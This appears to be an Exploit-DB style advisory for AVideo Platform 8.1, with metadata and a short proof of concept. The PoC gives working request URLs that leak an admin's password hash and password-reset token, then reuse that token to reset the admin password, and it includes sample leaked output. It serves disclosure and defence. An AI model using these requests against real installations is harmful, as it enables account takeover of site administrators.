AVideo Platform 8.1 - Cross Site Request Forgery (Password Reset)

vendor:

AVideo Platform

by:

Ihsan Sencan

8.8

CVSS

HIGH

Cross Site Request Forgery (CSRF)

352

CWE

Product Name: AVideo Platform

Affected Version From: 8.1

Affected Version To: 8.1

Patch Exists: NO

Related CWE: N/A

CPE: avideo:avideo_platform

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Linux

2020

AVideo Platform 8.1 – Cross Site Request Forgery (Password Reset)

AVideo Platform 8.1 is vulnerable to Cross Site Request Forgery (CSRF) which allows an attacker to reset the password of an admin user. An attacker can send a malicious request to the vulnerable endpoint objects/playlistsFromUser.json.php?users_id=[ID] to get the recoverPass parameter of the admin user. The attacker can then use the recoverPass parameter to reset the password of the admin user using the endpoint recoverPass?user=admin&recoverpass=0ce70c7b006c78552fee993adeaafadf.

Mitigation:

The application should implement a CSRF protection mechanism to prevent malicious requests from being executed.

Source

Exploit-DB raw data:

# Exploit Title: AVideo Platform 8.1 - Cross Site Request Forgery (Password Reset)
# Dork: N/A
# Date: 2020-02-05
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://avideo.com
# Software Link: https://github.com/WWBN/AVideo
# Version: 8.1
# Tested on: Linux
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/objects/playlistsFromUser.json.php?users_id=[ID]
# 
................
0	
id	92
user	"admin"
name	"Watch Later"
email	"user@localhost"
password	"bc79a173cc20f0897db1c5b004588db9"
created	"2019-05-16 21:42:42"
modified	"2019-05-16 21:42:42"
isAdmin	1
status	"watch_later"
photoURL	"videos/userPhoto/photo1.png"
lastLogin	"2020-02-03 08:11:08"
recoverPass	"0ce70c7b006c78552fee993adeaafadf"
................
#
# Password recovery can be done using recoverPass.
# http://localhost/[PATH]/recoverPass?user=admin&recoverpass=0ce70c7b006c78552fee993adeaafadf
#